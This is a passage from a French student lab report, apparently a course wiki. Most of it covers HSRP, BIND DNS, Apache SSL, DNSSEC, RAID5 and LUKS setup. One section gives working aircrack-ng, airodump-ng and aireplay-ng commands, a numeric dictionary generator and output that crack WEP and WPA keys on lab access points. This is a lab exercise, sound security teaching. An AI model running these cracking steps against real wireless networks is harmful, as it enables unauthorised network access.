 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 6e séance (additionnel) ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''000-speedflash.space-ssl.conf''' afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;#NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/www.speedflash.space&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
ServerName &amp;quot;speedflash.space&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''ports.conf''' du serveur Apache pour qu'il écoute le port 443 (SSL):&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Listen 80 443&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
        #NameVirtualHost *:443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2enmod ssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:SSLSite.png]]&lt;br /&gt;
&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 7e séance====&lt;br /&gt;
=====Création du RAID5=====&lt;br /&gt;
On ajoute premièrement les partitions à la définition de la machine virtuelle:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;A AJOUTER&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on crée le RAID5 avec les 3 partitions :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mdadm --create /dev/md0 --level=5 --raid-devices 3 /dev/xvdb /dev/xvdc /dev/xvdd&amp;lt;/pre&amp;gt;&lt;br /&gt;
On vérifie en regardant le fichier de log /proc/mdstat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.0% (692512/1047552) finish=0.1min speed=30109K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===============&amp;gt;.....]  recovery = 78.5% (823084/1047552) finish=0.1min speed=29395K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [================&amp;gt;....]  recovery = 84.2% (883700/1047552) finish=0.0min speed=29456K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=================&amp;gt;...]  recovery = 87.4% (916664/1047552) finish=0.0min speed=29569K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 93.5% (980148/1047552) finish=0.0min speed=30182K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 96.6% (1012980/1047552) finish=0.0min speed=30267K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 98.1% (1029332/1047552) finish=0.0min speed=30794K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 99.5% (1043028/1047552) finish=0.0min speed=30260K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# [ 1462.872022] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, on affecte un système de fichier à notre nouveau RAID sur /dev/md0, et on le monte dans /mnt: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# mkfs /dev/md0&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
Creating filesystem with 523776 4k blocks and 131072 inodes&lt;br /&gt;
Filesystem UUID: ca2b4bcd-57d3-4f12-bc49-0f7f9cb312b6&lt;br /&gt;
Superblock backups stored on blocks:&lt;br /&gt;
	32768, 98304, 163840, 229376, 294912&lt;br /&gt;
&lt;br /&gt;
Allocating group tables: done&lt;br /&gt;
Writing inode tables: done&lt;br /&gt;
Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
root@Flash:~# mount /dev/md0 /mnt&lt;br /&gt;
[ 1486.818679] EXT4-fs (md0): mounting ext2 file system using the ext4 subsystem&lt;br /&gt;
[ 1486.878898] EXT4-fs (md0): mounted filesystem without journal. Opts: (null)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Cryptage de données=====&lt;br /&gt;
Pour crypter les données, on installe GParted et cryptsetup. Sur la SD, il ne doit y avoir qu'une seule partition. C'est ce qu'on fait grâce à GParted.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, on commence le cryptage des données sur la carte SD: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/mmcblk1p1 &lt;br /&gt;
&lt;br /&gt;
WARNING!&lt;br /&gt;
========&lt;br /&gt;
Cette action écrasera définitivement les données sur /dev/mmcblk1p1.&lt;br /&gt;
&lt;br /&gt;
Are you sure? (Type uppercase yes): YES&lt;br /&gt;
Saisissez la phrase secrète : ***************&lt;br /&gt;
Vérifiez la phrase secrète : ***************&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on ouvre le volume crypté et on crée un système de fichiers avec le dossier home/ :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksOpen /dev/mmcblk1p1 home&lt;br /&gt;
Saisissez la phrase secrète pour /dev/mmcblk1p1 : &lt;br /&gt;
root@Rason:/home/pifou# mkfs.ext4 /dev/mapper/home&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
En train de créer un système de fichiers avec 3777792 4k blocs et 944704 i-noeuds.&lt;br /&gt;
UUID de système de fichiers=2c54cece-155f-44ed-b4a5-96b9429e7879&lt;br /&gt;
Superblocs de secours stockés sur les blocs : &lt;br /&gt;
	32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208&lt;br /&gt;
